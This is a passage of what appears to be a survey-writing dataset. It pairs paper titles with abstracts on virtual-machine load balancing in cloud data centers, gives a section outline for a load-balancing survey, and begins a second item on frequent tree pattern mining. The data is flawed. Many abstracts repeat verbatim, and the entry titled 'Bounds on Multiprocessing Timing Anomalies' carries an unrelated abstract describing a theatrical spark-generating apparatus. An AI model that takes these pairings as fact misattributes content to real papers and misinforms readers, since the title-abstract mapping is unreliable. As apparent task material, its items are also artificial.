energy-efficiency scheduling. FlexCloud has advantage in computing time and memory consumption to support large-scale simulations. The detailed design of FlexCloud is introduced and performance evaluation is provided. --- paper_title: A Toolkit for Modeling and Simulation of Real-Time Virtual Machine Allocation in a Cloud Data Center paper_content: Resource scheduling in infrastructure as a service (IaaS) is one of the keys for large-scale Cloud applications. 
Extensive research on all issues in real environment is extremely difficult because it requires developers to consider network infrastructure and the environment, which may be beyond the control. In addition, the network conditions cannot be predicted or controlled. Therefore, performance evaluation of workload models and Cloud provisioning algorithms in a repeatable manner under different configurations and requirements is difficult. There is still lack of tools that enable developers to compare different resource scheduling algorithms in IaaS regarding both computing servers and user workloads. To fill this gap in tools for evaluation and modeling of Cloud environments and applications, we propose CloudSched. CloudSched can help developers identify and explore appropriate solutions considering different resource scheduling algorithms. Unlike traditional scheduling algorithms considering only one factor such as CPU, which can cause hotspots or bottlenecks in many cases, CloudSched treats multidimensional resource such as CPU, memory and network bandwidth integrated for both physical machines and virtual machines (VMs) for different scheduling objectives (algorithms). In this paper, two existing simulation systems at application level for Cloud computing are studied, a novel lightweight simulation system is proposed for real-time VM scheduling in Cloud data centers, and results by applying the proposed simulation system are analyzed and discussed. --- paper_title: A hybrid meta-heuristic algorithm for VM scheduling with load balancing in cloud computing paper_content: Virtual machine (VM) scheduling with load balancing in cloud computing aims to assign VMs to suitable servers and balance the resource usage among all of the servers. In an infrastructure-as-a-service framework, there will be dynamic input requests, where the system is in charge of creating VMs without considering what types of tasks run on them. Therefore, scheduling that focuses only on fixed task sets or that requires detailed task information is not suitable for this system. This paper combines ant colony optimization and particle swarm optimization to solve the VM scheduling problem, with the result being known as ant colony optimization with particle swarm (ACOPS). ACOPS uses historical information to predict the workload of new input requests to adapt to dynamic environments without additional task information. ACOPS also rejects requests that cannot be satisfied before scheduling to reduce the computing time of the scheduling procedure. Experimental results indicate that the proposed algorithm can keep the load balance in a dynamic environment and outperform other approaches. --- paper_title: Energy Efficient Multi Dimensional Host Load Aware Algorithm for Virtual Machine Placement and Optimization in Cloud Environment paper_content: The effectiveness and elasticity of virtual machine placement has become a main concern in modern cloud computing environment. Mapping the virtual machines to the physical machines cluster is called the VM placement. In this paper we present an efficient hybrid genetic based host load aware algorithm for scheduling and optimization of virtual machines in a cluster of Physical hosts. We used two different techniques, first initial VM packing is done by checking the load of the physical host and the user constraints of the VMs. Second optimization of placed VMs is done by using a hybrid genetic algorithm based on fitness function. 
The presented algorithm is implemented in JAVA Net beans IDE, and Clouds simulator has been used for simulation to assess the execution and performance of our heuristics by comparison with algorithms first fit, best fit and round robin. The performance of the proposed algorithm was examined from both users and service provider’s perception. The simulation results show that our proposed algorithm uses the less number of physical servers for placing a certain number of VMs which helps to improve the resource utilization rate. The response time of our algorithm is little bit more than the first fit algorithm because of its nature of allocating VMs is based on the user constraints and past usage history of the VMs. Elevated SLA satisfaction rate and inferior load imbalance rate was observed in results. Since we used a modified version of hybrid genetic algorithm for load optimization the percentage of VM migrations had been decreased through which we can achieve the better results for load balancing along with cost reduction. The results also show that our hybrid genetic based multi dimensional host load aware and user constraints based algorithm is applicable, valuable and reliable for implementation in real data center environments. --- paper_title: A dynamic and integrated load-balancing scheduling algorithm for Cloud datacenters paper_content: One of the challenging scheduling problems in Cloud datacenters is to take the allocation and migration of reconfigurable virtual machines into consideration as well as the integrated features of hosting physical machines. We introduce a dynamic and integrated resource scheduling algorithm (DAIRS) for Cloud datacenters. Unlike traditional load-balance scheduling algorithms which consider only one factor such as the CPU load in physical servers, DAIRS treats CPU, memory and network bandwidth integrated for both physical machines and virtual machines. We develop integrated measurement for the total imbalance level of a Cloud datacenter as well as the average imbalance level of each server. Simulation results show that DAIRS has good performance with regard to total imbalance level, average imbalance level of each server, as well as overall running time. --- paper_title: Prepartition: A new paradigm for the load balance of virtual machine reservations in data centers paper_content: It is significant to apply load-balancing strategy to improve the performance and reliability of resource in data centers. One of the challenging scheduling problems in Cloud data centers is to take the allocation and migration of reconfigurable virtual machines (VMs) as well as the integrated features of hosting physical machines (PMs) into consideration. In the reservation model, workload of data centers has fixed process interval characteristics. In general, load-balance scheduling is NP-hard problem as proved in many open literatures. Traditionally, for offline load balance without migration, one of the best approaches is LPT (Longest Process Time first), which is well known to have approximation ratio 4/3. With virtualization, reactive (post) migration of VMs after allocation is one popular way for load balance and traffic consolidation. However, reactive migration has difficulty to reach predefined load balance objectives, and may cause interruption and instability of service and other associated costs. 
In view of this, we propose a new paradigm-Prepartition: it proactively sets process-time bound for each request on each PM and prepares in advance to migrate VMs to achieve the predefined balance goal. Prepartition can reduce process time by preparing VM migration in advance and therefore reduce instability and achieve better load balance as desired. Trace-driven and synthetic simulation results show that Prepartition has 10%-20% better performance than the well known load balancing algorithms with regard to average CPU utilization, makespan as well as capacity makespan. --- paper_title: A Scheduling Strategy on Load Balancing of Virtual Machine Resources in Cloud Computing Environment paper_content: The current virtual machine(VM) resources scheduling in cloud computing environment mainly considers the current state of the system but seldom considers system variation and historical data, which always leads to load imbalance of the system. In view of the load balancing problem in VM resources scheduling, this paper presents a scheduling strategy on load balancing of VM resources based on genetic algorithm. According to historical data and current state of the system and through genetic algorithm, this strategy computes ahead the influence it will have on the system after the deployment of the needed VM resources and then chooses the least-affective solution, through which it achieves the best load balancing and reduces or avoids dynamic migration. This strategy solves the problem of load imbalance and high migration cost by traditional algorithms after scheduling. Experimental results prove that this method is able to realize load balancing and reasonable resources utilization both when system load is stable and variant. --- paper_title: A Load Balancing Scheme Using Federate Migration Based on Virtual Machines for Cloud Simulations paper_content: A maturing and promising technology, Cloud computing can benefit large-scale simulations by providing on-demand, anywhere simulation services to users. In order to enable multitask and multiuser simulation systems with Cloud computing, Cloud simulation platform (CSP) was proposed and developed. To use key techniques of Cloud computing such as virtualization to promote the running efficiency of large-scale military HLA systems, this paper proposes a new type of federate container, virtual machine (VM), and its dynamic migration algorithm considering both computation and communication cost. Experiments show that the migration scheme effectively improves the running efficiency of HLA system when the distributed system is not saturated. --- paper_title: Virtual machine mapping policy based on load balancing in private cloud environment paper_content: The virtual machine allocation problem is the key to build a private cloud environment. This paper presents a virtual machine mapping policy based on multi-resource load balancing. It uses the resource consumption of the running virtual machine and the self-adaptive weighted approach, which resolves the load balancing conflicts of each independent resource caused by different demand for resources of cloud applications. Meanwhile, it uses probability approach to ease the problem of load crowding in the concurrent users scene. The experiments and comparative analysis show that this policy achieves the better effect than existing approach. 
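The Prepartition work cited above takes LPT (Longest Processing Time first), with its well-known 4/3 approximation ratio, as the classical offline baseline. LPT sorts requests by processing time in descending order and assigns each one to the currently least-loaded machine; a minimal sketch using a min-heap over machine loads is shown below (the reservation-interval and capacity details of the Prepartition model are not reproduced here).

```python
# LPT (Longest Processing Time first): sort jobs by processing time in
# descending order, then assign each job to the currently least-loaded
# machine. This is the textbook 4/3-approximation baseline referenced
# above; VM-reservation specifics of the cited paper are omitted.
import heapq
from typing import List, Tuple

def lpt_schedule(times: List[float], m: int) -> Tuple[float, List[List[int]]]:
    """Return (makespan, per-machine job indices) for m identical machines."""
    heap = [(0.0, k) for k in range(m)]      # (current load, machine id)
    heapq.heapify(heap)
    assignment: List[List[int]] = [[] for _ in range(m)]
    order = sorted(range(len(times)), key=lambda j: times[j], reverse=True)
    for j in order:
        load, k = heapq.heappop(heap)        # least-loaded machine so far
        assignment[k].append(j)
        heapq.heappush(heap, (load + times[j], k))
    makespan = max(load for load, _ in heap)
    return makespan, assignment

if __name__ == "__main__":
    print(lpt_schedule([7, 7, 6, 6, 5, 4, 4, 3], m=3))
```

Prepartition differs from this reactive baseline by bounding process time per request on each PM in advance, so migrations are planned before imbalance occurs rather than after.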
--- paper_title: Cloud brokering mechanisms for optimized placement of virtual machines across multiple providers paper_content: In the past few years, we have witnessed the proliferation of a heterogeneous ecosystem of cloud providers, each one with a different infrastructure offer and pricing policy. We explore this heterogeneity in a novel cloud brokering approach that optimizes placement of virtual infrastructures across multiple clouds and also abstracts the deployment and management of infrastructure components in these clouds. The feasibility of our approach is evaluated in a high throughput computing cluster case study. Experimental results confirm that multi-cloud deployment provides better performance and lower costs compared to the usage of a single cloud only. --- paper_title: An Optimized Control Strategy for Load Balancing Based on Live Migration of Virtual Machine paper_content: Virtual machine migration technology has received extensive attention in load balancing. In this paper, we propose an optimized control strategy which combines a multi-strategy mechanism with a prediction mechanism. According to the weighted average of the CPU, memory, I/O and network bandwidth utilization, we divide the hosts into four status domains. Hosts within different load status domains adopt different migration strategies, which consider migration timing, the migration candidate VM and the migration destination. This strategy reduces the number of overloaded hosts, avoids the instantaneous peak problem caused by the migration of virtual machines, and addresses the imbalance and high-cost problems of traditional migration scheduling algorithms. Experimental results demonstrate that this strategy is able to reduce the number of migrations and improve system performance. --- paper_title: AR model prediction of time series with trends and seasonalities: A contrast with Box-Jenkins modeling paper_content: A "long" autoregressive (AR) model alternative to the classical Box-Jenkins ARIMA model method of modeling time series with trend and seasonality characteristics is considered. Superior forecast performance is demonstrated by our long AR model method on the Box-Jenkins Series G airline passenger data. The difference in performance is accounted for by the relative underparameterization of the Box-Jenkins method. A Householder transformation-Akaike AIC criterion method is employed for determining the best data-transformed, detrended-deseasonalized, stationary-residuals AR-modeled time series. --- paper_title: Performance evaluation of web servers using central load balancing policy over virtual machines on cloud paper_content: Cloud Computing adds more power to the existing Internet technologies. Virtualization harnesses the power of the existing infrastructure and resources. With virtualization we can simultaneously run multiple instances of different commodity operating systems. Since we have limited processors and jobs work in a concurrent fashion, overload situations can occur. Things become even more challenging in a distributed environment. We propose a Central Load Balancing Policy for Virtual Machines (CLBVM) to balance the load evenly in a distributed virtual machine/cloud computing environment. This work tries to compare the performance of web servers based on our CLBVM policy and an independent virtual machine (VM) running on a single physical server using Xen virtualization.
The paper discusses the efficacy and feasibility of using this kind of policy for overall performance improvement. --- paper_title: A distributed and collaborative dynamic load balancer for virtual machine paper_content: With the number of services using virtualization and clouds growing faster and faster, it is common to mutualize thousands of virtual machines within one distributed system. Consequently, the virtualized services, softwares, hardwares and infrastructures share the same physical resources, thus the performance of one depends of the resources usage of others. We propose a solution for vm load balancing (and rebalancing) based on the observation of the resources quota and the dynamic usage that leads to better balancing of resources. As it is not possible to have a single scheduler for the whole cloud and to avoid a single point of failure, our scheduler uses distributed and collaborative scheduling agents. We present scenarios simulating various cloud resources and vm usage experimented on our testbed p2p architecture. --- paper_title: A dynamic and integrated load-balancing scheduling algorithm for Cloud datacenters paper_content: One of the challenging scheduling problems in Cloud datacenters is to take the allocation and migration of reconfigurable virtual machines into consideration as well as the integrated features of hosting physical machines. We introduce a dynamic and integrated resource scheduling algorithm (DAIRS) for Cloud datacenters. Unlike traditional load-balance scheduling algorithms which consider only one factor such as the CPU load in physical servers, DAIRS treats CPU, memory and network bandwidth integrated for both physical machines and virtual machines. We develop integrated measurement for the total imbalance level of a Cloud datacenter as well as the average imbalance level of each server. Simulation results show that DAIRS has good performance with regard to total imbalance level, average imbalance level of each server, as well as overall running time. --- paper_title: Bounds on Multiprocessing Timing Anomalies paper_content: An apparatus for generating sparks over a selected area to be used for theatrical effects. Metal wire having a diameter in the range of 0.020-0.125 inches is provided by two, independent supply sources. Each wire supply source is coupled to a wire guide which imposes synchronous, linear movement to each wire source at a selected rate. Each wire source is coupled to a tip assembly which places the terminus of each wire source adjacent one another. The positive and negative electrodes of a direct current power source are electrically connected to a respective terminus of each of the pair of wire sources, the output of the direct current power source is amplified to voltage sufficient to atomize the wire when the power source is short circuited. The atomization of the wire results in the production of heated, metallic particles simulating generated sparks. A source of compressed air is disposed adjacent the point of atomization. The atomized particles are disseminated across an area determined by the force imposed thereon by the compressed air. --- paper_title: Prepartition: A new paradigm for the load balance of virtual machine reservations in data centers paper_content: It is significant to apply load-balancing strategy to improve the performance and reliability of resource in data centers. 
One of the challenging scheduling problems in Cloud data centers is to take the allocation and migration of reconfigurable virtual machines (VMs) as well as the integrated features of hosting physical machines (PMs) into consideration. In the reservation model, workload of data centers has fixed process interval characteristics. In general, load-balance scheduling is NP-hard problem as proved in many open literatures. Traditionally, for offline load balance without migration, one of the best approaches is LPT (Longest Process Time first), which is well known to have approximation ratio 4/3. With virtualization, reactive (post) migration of VMs after allocation is one popular way for load balance and traffic consolidation. However, reactive migration has difficulty to reach predefined load balance objectives, and may cause interruption and instability of service and other associated costs. In view of this, we propose a new paradigm-Prepartition: it proactively sets process-time bound for each request on each PM and prepares in advance to migrate VMs to achieve the predefined balance goal. Prepartition can reduce process time by preparing VM migration in advance and therefore reduce instability and achieve better load balance as desired. Trace-driven and synthetic simulation results show that Prepartition has 10%-20% better performance than the well known load balancing algorithms with regard to average CPU utilization, makespan as well as capacity makespan. --- paper_title: Energy Efficient Multi Dimensional Host Load Aware Algorithm for Virtual Machine Placement and Optimization in Cloud Environment paper_content: The effectiveness and elasticity of virtual machine placement has become a main concern in modern cloud computing environment. Mapping the virtual machines to the physical machines cluster is called the VM placement. In this paper we present an efficient hybrid genetic based host load aware algorithm for scheduling and optimization of virtual machines in a cluster of Physical hosts. We used two different techniques, first initial VM packing is done by checking the load of the physical host and the user constraints of the VMs. Second optimization of placed VMs is done by using a hybrid genetic algorithm based on fitness function. The presented algorithm is implemented in JAVA Net beans IDE, and Clouds simulator has been used for simulation to assess the execution and performance of our heuristics by comparison with algorithms first fit, best fit and round robin. The performance of the proposed algorithm was examined from both users and service provider’s perception. The simulation results show that our proposed algorithm uses the less number of physical servers for placing a certain number of VMs which helps to improve the resource utilization rate. The response time of our algorithm is little bit more than the first fit algorithm because of its nature of allocating VMs is based on the user constraints and past usage history of the VMs. Elevated SLA satisfaction rate and inferior load imbalance rate was observed in results. Since we used a modified version of hybrid genetic algorithm for load optimization the percentage of VM migrations had been decreased through which we can achieve the better results for load balancing along with cost reduction. The results also show that our hybrid genetic based multi dimensional host load aware and user constraints based algorithm is applicable, valuable and reliable for implementation in real data center environments. 
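The hybrid genetic placement algorithm in the preceding entry optimizes an initial packing with a fitness function, but the abstract does not state the function itself. A common choice, used here purely as an illustrative assumption, is to score a candidate placement by how evenly it spreads load across hosts, for example the reciprocal of one plus the standard deviation of host loads; the encoding of a placement as a VM-to-host index list is likewise assumed for this sketch.

```python
# Illustrative fitness function for a GA over VM placements. A placement
# is encoded as a list where placement[i] is the host index of VM i.
# The "1 / (1 + std dev of host loads)" fitness is an assumed example;
# the cited paper's actual fitness function is not given in its abstract.
from statistics import pstdev
from typing import List

def host_loads(placement: List[int], vm_load: List[float], n_hosts: int) -> List[float]:
    """Aggregate the load each host receives under a candidate placement."""
    loads = [0.0] * n_hosts
    for vm, host in enumerate(placement):
        loads[host] += vm_load[vm]
    return loads

def fitness(placement: List[int], vm_load: List[float], n_hosts: int) -> float:
    """Higher is better: rewards placements with evenly loaded hosts."""
    return 1.0 / (1.0 + pstdev(host_loads(placement, vm_load, n_hosts)))

if __name__ == "__main__":
    vm_load = [0.4, 0.3, 0.2, 0.6, 0.5]
    balanced = [0, 1, 2, 1, 2]
    unbalanced = [0, 0, 0, 0, 0]
    print(fitness(balanced, vm_load, 3), ">", fitness(unbalanced, vm_load, 3))
```

In a full GA, this score would drive selection, while crossover and mutation would swap or reassign host indices in the placement vectors.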
--- paper_title: Prepartition: A new paradigm for the load balance of virtual machine reservations in data centers paper_content: It is significant to apply load-balancing strategy to improve the performance and reliability of resource in data centers. One of the challenging scheduling problems in Cloud data centers is to take the allocation and migration of reconfigurable virtual machines (VMs) as well as the integrated features of hosting physical machines (PMs) into consideration. In the reservation model, workload of data centers has fixed process interval characteristics. In general, load-balance scheduling is NP-hard problem as proved in many open literatures. Traditionally, for offline load balance without migration, one of the best approaches is LPT (Longest Process Time first), which is well known to have approximation ratio 4/3. With virtualization, reactive (post) migration of VMs after allocation is one popular way for load balance and traffic consolidation. However, reactive migration has difficulty to reach predefined load balance objectives, and may cause interruption and instability of service and other associated costs. In view of this, we propose a new paradigm-Prepartition: it proactively sets process-time bound for each request on each PM and prepares in advance to migrate VMs to achieve the predefined balance goal. Prepartition can reduce process time by preparing VM migration in advance and therefore reduce instability and achieve better load balance as desired. Trace-driven and synthetic simulation results show that Prepartition has 10%-20% better performance than the well known load balancing algorithms with regard to average CPU utilization, makespan as well as capacity makespan. --- paper_title: Virtual machine mapping policy based on load balancing in private cloud environment paper_content: The virtual machine allocation problem is the key to build a private cloud environment. This paper presents a virtual machine mapping policy based on multi-resource load balancing. It uses the resource consumption of the running virtual machine and the self-adaptive weighted approach, which resolves the load balancing conflicts of each independent resource caused by different demand for resources of cloud applications. Meanwhile, it uses probability approach to ease the problem of load crowding in the concurrent users scene. The experiments and comparative analysis show that this policy achieves the better effect than existing approach. --- paper_title: Energy Efficient Multi Dimensional Host Load Aware Algorithm for Virtual Machine Placement and Optimization in Cloud Environment paper_content: The effectiveness and elasticity of virtual machine placement has become a main concern in modern cloud computing environment. Mapping the virtual machines to the physical machines cluster is called the VM placement. In this paper we present an efficient hybrid genetic based host load aware algorithm for scheduling and optimization of virtual machines in a cluster of Physical hosts. We used two different techniques, first initial VM packing is done by checking the load of the physical host and the user constraints of the VMs. Second optimization of placed VMs is done by using a hybrid genetic algorithm based on fitness function. The presented algorithm is implemented in JAVA Net beans IDE, and Clouds simulator has been used for simulation to assess the execution and performance of our heuristics by comparison with algorithms first fit, best fit and round robin. 
The performance of the proposed algorithm was examined from both the users' and the service provider's perspective. The simulation results show that our algorithm uses fewer physical servers for placing a given number of VMs, which helps to improve the resource utilization rate. The response time of our algorithm is slightly higher than that of the first-fit algorithm because it allocates VMs based on user constraints and the past usage history of the VMs. A higher SLA satisfaction rate and a lower load imbalance rate were observed in the results. Since we use a modified hybrid genetic algorithm for load optimization, the percentage of VM migrations is decreased, which yields better load balancing along with cost reduction. The results also show that our hybrid genetic, multi-dimensional, host-load-aware and user-constraint-based algorithm is applicable, valuable and reliable for implementation in real data center environments. --- paper_title: A Scheduling Strategy on Load Balancing of Virtual Machine Resources in Cloud Computing Environment paper_content: Current virtual machine (VM) resource scheduling in cloud computing environments mainly considers the current state of the system but seldom considers system variation and historical data, which often leads to load imbalance in the system. In view of the load balancing problem in VM resource scheduling, this paper presents a scheduling strategy for load balancing of VM resources based on a genetic algorithm. Using historical data and the current state of the system, this strategy computes in advance the influence that deploying the needed VM resources will have on the system and then chooses the solution with the least impact, through which it achieves the best load balancing and reduces or avoids dynamic migration. This strategy avoids the load imbalance and high migration cost that traditional algorithms incur after scheduling. Experimental results prove that this method is able to realize load balancing and reasonable resource utilization both when the system load is stable and when it varies. --- paper_title: Cloud brokering mechanisms for optimized placement of virtual machines across multiple providers paper_content: In the past few years, we have witnessed the proliferation of a heterogeneous ecosystem of cloud providers, each one with a different infrastructure offer and pricing policy. We explore this heterogeneity in a novel cloud brokering approach that optimizes placement of virtual infrastructures across multiple clouds and also abstracts the deployment and management of infrastructure components in these clouds. The feasibility of our approach is evaluated in a high-throughput computing cluster case study. Experimental results confirm that multi-cloud deployment provides better performance and lower costs compared to the usage of a single cloud only. --- paper_title: A hybrid meta-heuristic algorithm for VM scheduling with load balancing in cloud computing paper_content: Virtual machine (VM) scheduling with load balancing in cloud computing aims to assign VMs to suitable servers and balance the resource usage among all of the servers. In an infrastructure-as-a-service framework, there will be dynamic input requests, where the system is in charge of creating VMs without considering what types of tasks run on them.
Therefore, scheduling that focuses only on fixed task sets or that requires detailed task information is not suitable for this system. This paper combines ant colony optimization and particle swarm optimization to solve the VM scheduling problem, with the result being known as ant colony optimization with particle swarm (ACOPS). ACOPS uses historical information to predict the workload of new input requests in order to adapt to dynamic environments without additional task information. ACOPS also rejects, before scheduling, requests that cannot be satisfied, to reduce the computing time of the scheduling procedure. Experimental results indicate that the proposed algorithm can keep the load balanced in a dynamic environment and outperforms other approaches. ---
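The ACOPS abstract above mentions two ideas that are easy to illustrate in isolation: rejecting requests that no host can satisfy before scheduling, and then placing the remaining requests so as to keep hosts balanced. The sketch below is a hypothetical simplification (a single-resource greedy placement with our own function and variable names), not the ACO/PSO hybrid itself.

```python
def place_requests(requests, capacities):
    """Toy illustration (not ACOPS): pre-check each VM request against the
    remaining capacity of every host and reject it up front if no host can
    satisfy it; otherwise place it on the host with the most remaining capacity.
    requests: list of resource demands; capacities: list of host capacities."""
    remaining = list(capacities)
    placement, rejected = {}, []
    for i, demand in enumerate(requests):
        # Reject-before-schedule: skip requests no host can accommodate.
        feasible = [h for h, cap in enumerate(remaining) if cap >= demand]
        if not feasible:
            rejected.append(i)
            continue
        # Greedy balancing: pick the host with the largest remaining capacity.
        h = max(feasible, key=lambda host: remaining[host])
        remaining[h] -= demand
        placement[i] = h
    return placement, rejected, remaining

if __name__ == "__main__":
    print(place_requests([4, 3, 6, 5, 9], [8, 8, 8]))
```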
Title: A Survey on Load Balancing Algorithms for VM Placement in Cloud Computing
Section 1: INTRODUCTION
Description 1: This section provides an overview of the significance of load balancing in traditional and cloud data centers and outlines the key contributions and structure of the paper.
Section 2: Related Work
Description 2: This section reviews existing literature and survey papers related to VM load balancing, highlighting their focus areas and limitations.
Section 3: Related Technology
Description 3: This section introduces essential technologies related to load balancing, including virtualization, VM migration, and VM consolidation.
Section 4: Scenario
Description 4: This section outlines different scenarios for VM load balancing algorithms, including public, private, and hybrid cloud environments, and discusses constraints and characteristics specific to each scenario.
Section 5: VM LOAD BALANCING ALGORITHM MODELING IN CLOUDS
Description 5: This section discusses the design considerations for VM load balancing algorithms, including VM resource type, VM type uniformity, allocation dynamicity, optimization strategy, and scheduling process.
Section 6: LOAD BALANCING SCHEDULING METRICS COMPARISON
Description 6: This section lists and describes various metrics used to evaluate VM load balancing algorithms, such as load variance, makespan, and SLA violations.
Section 7: PERFORMANCE EVALUATION APPROACHES
Description 7: This section presents different platforms and simulation toolkits used for evaluating the performance of VM load balancing algorithms, providing examples of experimental configurations and results.
Section 8: ALGORITHMS COMPARISON
Description 8: This section provides detailed descriptions and comparisons of several specific VM load balancing algorithms, highlighting their strengths and weaknesses.
Section 9: CHALLENGES AND FUTURE DIRECTIONS
Description 9: This section discusses the challenges faced by current VM load balancing algorithms and proposes future research directions to address these challenges.
Frequent tree pattern mining: A survey
9
--- paper_title: Web Mining Research: A Survey paper_content: With the huge amount of information available online, the World Wide Web is a fertile area for data mining research. The Web mining research is at the cross road of research from several research communities, such as database, information retrieval, and within AI, especially the sub-areas of machine learning and natural language processing. However, there is a lot of confusions when comparing research efforts from different point of views. In this paper, we survey the research in the area of Web mining, point out some confusions regarded the usage of the term Web mining and suggest three Web mining categories. Then we situate some of the research with respect to these three categories. We also explore the connection between the Web mining categories and the related agent paradigm. For the survey, we focus on representation issues, on the process, on the learning algorithm, and on the application of the recent works as the criteria. We conclude the paper with some research issues. --- paper_title: Challenges in mining social network data: processes, privacy, and paradoxes paper_content: The profileration of rich social media, on-line communities, and collectively produced knowledge resources has accelerated the convergence of technological and social networks, producing environments that reflect both the architecture of the underlying information systems and the social structure on their members. In studying the consequences of these developments, we are faced with the opportunity to analyze social network data at unprecedented levels of scale and temporal resolution; this has led to a growing body of research at the intersection of the computing and social sciences. We discuss some of the current challenges in the analysis of large-scale social network data, focusing on two themes in particular: the inference of social processes from data, and the problem of maintaining individual privacy in studies of social networks. While early research on this type of data focused on structural questions, recent work has extended this to consider the social processes that unfold within the networks. Particular lines of investigation have focused on processes in on-line social systems related to communication [1, 22], community formation [2, 8, 16, 23], information-seeking and collective problem-solving [20, 21, 18], marketing [12, 19, 24, 28], the spread of news [3, 17], and the dynamics of popularity [29]. There are a number of fundamental issues, however, for which we have relatively little understanding, including the extent to which the outcomes of these types of social processes are predictable from their early stages (see e.g. [29]), the differences between properties of individuals and properties of aggregate populations in these types of data, and the extent to which similar social phenomena in different domains have uniform underlying explanations. The second theme we pursue is concerned with the problem of privacy. While much of the research on large-scale social systems has been carried out on data that is public, some of the richest emerging sources of social interaction data come from settings such as e-mail, instant messaging, or phone communication in which users have strong expectations of privacy. How can such data be made available to researchers while protecting the privacy of the individuals represented in the data? 
Many of the standard approaches here are variations on the principle of anonymization - the names of individuals are replaced with meaningless unique identifiers, so that the network structure is maintained while private information has been suppressed. In recent joint work with Lars Backstrom and Cynthia Dwork, we have identified some fundamental limitations on the power of network anonymization to ensure privacy [7]. In particular, we describe a family of attacks such that even from a single anonymized copy of a social network, it is possible for an adversary to learn whether edges exist or not between specific targeted pairs of nodes. The attacks are based on the uniqueness of small random subgraphs embedded in an arbitrary network, using ideas related to those found in arguments from Ramsey theory [6, 14]. Combined with other recent examples of privacy breaches in data containing rich textual or time-series information [9, 26, 27, 30], these results suggest that anonymization contains pitfalls even in very simple settings. In this way, our approach can be seen as a step toward understanding how techniques of privacy-preserving data mining (see e.g. [4, 5, 10, 11, 13, 15, 25] and the references therein) can inform how we think about the protection of eventhe most skeletal social network data. --- paper_title: Frequent Subtree Mining - An Overview paper_content: Mining frequent subtrees from databases of labeled trees is a new research field that has many practical applications in areas such as computer networks, Web mining, bioinformatics, XML document mining, etc. These applications share a requirement for the more expressive power of labeled trees to capture the complex relations among data entities. Although frequent subtree mining is a more difficult task than frequent itemset mining, most existing frequent subtree mining algorithms borrow techniques from the relatively mature association rule mining area. This paper provides an overview of a broad range of tree mining algorithms. We focus on the common theoretical foundations of the current frequent subtree mining algorithms and their relationship with their counterparts in frequent itemset mining. When comparing the algorithms, we categorize them according to their problem definitions and the techniques employed for solving various subtasks of the subtree mining problem. In addition, we also present a thorough performance study for a representative family of algorithms. --- paper_title: XRules: an effective structural classifier for XML data paper_content: XML documents have recently become ubiquitous because of their varied applicability in a number of applications. Classification is an important problem in the data mining domain, but current classification methods for XML documents use IR-based methods in which each document is treated as a bag of words. Such techniques ignore a significant amount of information hidden inside the documents. In this paper we discuss the problem of rule based classification of XML data by using frequent discriminatory substructures within XML documents. Such a technique is more capable of finding the classification characteristics of documents. In addition, the technique can also be extended to cost sensitive classification. We show the effectiveness of the method with respect to other classifiers. We note that the methodology discussed in this paper is applicable to any kind of semi-structured data. 
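The XRules abstract above describes classifying XML documents by frequent discriminatory substructures. As a rough, hypothetical illustration of the rule-based idea only, the sketch below simplifies patterns to sets of node labels (actual XRules patterns are subtrees) and picks the highest-confidence matching rule, falling back to a default class when no rule fires.

```python
from collections import namedtuple

Rule = namedtuple("Rule", ["pattern", "label", "confidence"])

def classify(doc_labels, rules, default_label):
    """Toy rule-based classifier in the spirit of XRules (not its actual
    implementation): a rule fires when its pattern (simplified here to a set of
    node labels) is contained in the document; among the rules that fire, the one
    with the highest confidence decides the class, otherwise a default is used."""
    fired = [r for r in rules if r.pattern <= doc_labels]
    if not fired:
        return default_label
    return max(fired, key=lambda r: r.confidence).label

rules = [
    Rule(frozenset({"invoice", "total"}), "order", 0.9),      # hypothetical rules
    Rule(frozenset({"author", "abstract"}), "article", 0.8),
]
print(classify({"author", "abstract", "title"}, rules, "unknown"))  # -> "article"
```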
--- paper_title: Mining molecular fragments: finding relevant substructures of molecules paper_content: We present an algorithm to find fragments in a set of molecules that help to discriminate between different classes of for instance, activity in a drug discovery context. Instead of carrying out a brute-force search, our method generates fragments by embedding them in all appropriate molecules in parallel and prunes the search tree based on a local order of the atoms and bonds, which results in substantially faster search by eliminating the need for frequent, computationally expensive reembeddings and by suppressing redundant search. We prove the usefulness of our algorithm by demonstrating the discovery of activity-related groups of chemical compounds in the well-known National Cancer Institute's HIV-screening dataset. --- paper_title: Xproj: a framework for projected structural clustering of xml documents paper_content: XML has become a popular method of data representation both on the web and in databases in recent years. One of the reasons for the popularity of XML has been its ability to encode structural information about data records. However, this structural characteristic of data sets also makes it a challenging problem for a variety of data mining problems. One such problem is that of clustering, in which the structural aspects of the data result in a high implicit dimensionality of the data representation. As a result, it becomes more difficult to cluster the data in a meaningful way. In this paper, we propose an effective clustering algorithm for XML data which uses substructures of the documents in order to gain insights about the important underlying structures. We propose new ways of using multiple sub-structuralinformation in XML documents to evaluate the quality of intermediate cluster solutions, and guide the algorithms to a final solution which reflects the true structural behavior in individual partitions. We test the algorithm on a variety of real and synthetic data sets. --- paper_title: Frequent Subtree Mining - An Overview paper_content: Mining frequent subtrees from databases of labeled trees is a new research field that has many practical applications in areas such as computer networks, Web mining, bioinformatics, XML document mining, etc. These applications share a requirement for the more expressive power of labeled trees to capture the complex relations among data entities. Although frequent subtree mining is a more difficult task than frequent itemset mining, most existing frequent subtree mining algorithms borrow techniques from the relatively mature association rule mining area. This paper provides an overview of a broad range of tree mining algorithms. We focus on the common theoretical foundations of the current frequent subtree mining algorithms and their relationship with their counterparts in frequent itemset mining. When comparing the algorithms, we categorize them according to their problem definitions and the techniques employed for solving various subtasks of the subtree mining problem. In addition, we also present a thorough performance study for a representative family of algorithms. --- paper_title: HybridTreeMiner: an efficient algorithm for mining frequent rooted trees and free trees using canonical forms paper_content: Tree structures are used extensively in domains such as computational biology, pattern recognition, XML databases, computer networks, and so on. 
In this paper, we present HybridTreeMiner, a computationally efficient algorithm that discovers all frequently occurring subtrees in a database of rooted unordered trees. The algorithm mines frequent subtrees by traversing an enumeration tree that systematically enumerates all subtrees. The enumeration tree is defined based on a novel canonical form for rooted unordered trees - the breadth-first canonical form (BFCF). By extending the definitions of our canonical form and enumeration tree to free trees, our algorithm can efficiently handle databases of free trees as well. We study the performance of our algorithms through extensive experiments based on both synthetic data and datasets from real applications. The experiments show that our algorithm is competitive in comparison to known rooted tree mining algorithms and is faster by one to two orders of magnitudes compared to a known algorithm for mining frequent free trees. --- paper_title: Frequent Subtree Mining - An Overview paper_content: Mining frequent subtrees from databases of labeled trees is a new research field that has many practical applications in areas such as computer networks, Web mining, bioinformatics, XML document mining, etc. These applications share a requirement for the more expressive power of labeled trees to capture the complex relations among data entities. Although frequent subtree mining is a more difficult task than frequent itemset mining, most existing frequent subtree mining algorithms borrow techniques from the 